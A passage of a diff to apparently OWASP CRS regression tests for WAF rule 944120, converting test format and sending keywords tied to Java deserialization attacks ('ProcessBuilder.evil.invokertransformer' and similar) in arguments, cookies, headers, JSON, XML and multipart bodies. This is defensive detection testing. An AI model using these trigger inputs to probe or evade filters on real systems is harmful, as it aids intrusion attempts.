"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" + output: + log: + expect_ids: [944120] + - test_id: 81 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 82 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.invokertransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-83 + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 83 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.invokertransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-84 + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 84 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.invokertransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-85 + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 85 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.invokertransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-86 + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 86 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log: + expect_ids: [944120] + - test_id: 87 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory=test" + output: + log: + expect_ids: [944120] + - test_id: 88 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-89 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 89 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.prototypeclonefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-90 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeclonefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 90 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-91 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 91 desc: "XML element includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-92 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 92 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-93 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 93 desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-94 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 94 desc: "XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-95 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log: + expect_ids: [944120] + - test_id: 95 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-96 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log: + expect_ids: [944120] + - test_id: 96 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-97 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log: + expect_ids: [944120] + - test_id: 97 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-98 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" + output: + log: + expect_ids: [944120] + - test_id: 98 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-99 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 99 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeclonefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-100 + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 100 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeclonefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-101 + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 101 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeclonefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-102 + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 102 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeclonefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-103 + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 103 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-104 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log: + expect_ids: [944120] + - test_id: 104 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-105 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 